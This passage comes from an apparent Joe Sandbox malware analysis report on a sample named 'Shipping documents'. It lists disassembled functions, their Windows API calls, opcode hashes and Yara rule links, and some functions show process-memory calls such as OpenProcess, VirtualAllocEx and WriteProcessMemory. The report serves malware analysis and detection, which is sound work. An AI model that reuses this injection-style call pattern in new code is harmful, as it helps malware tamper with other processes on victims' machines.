                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1489400265-0
                                                                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                          Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 1042038666-0
                                                                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                          Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625713937-0
                                                                                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                          Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 0041780F
                                                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                          • __getptd.LIBCMT ref: 00417826
                                                                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                                                                          • __lock.LIBCMT ref: 00417844
                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 938513278-0
                                                                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                          Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2403457894-0
                                                                                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                          Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 4247068974-0
                                                                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                          Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )$U$\
                                                                                                          • API String ID: 0-3705770531
                                                                                                          • Opcode ID: cab44b3ffacf814a37243ad8e9565b9a9019564313d98acd175bff8324d5f553
                                                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                          • Opcode Fuzzy Hash: cab44b3ffacf814a37243ad8e9565b9a9019564313d98acd175bff8324d5f553
                                                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                          Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                          Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                          • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                          • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                          • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                          Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                          • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                          • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                          • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                          Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                          • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                          • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                          • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                          Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 708495834-557222456
                                                                                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                          Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                          Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
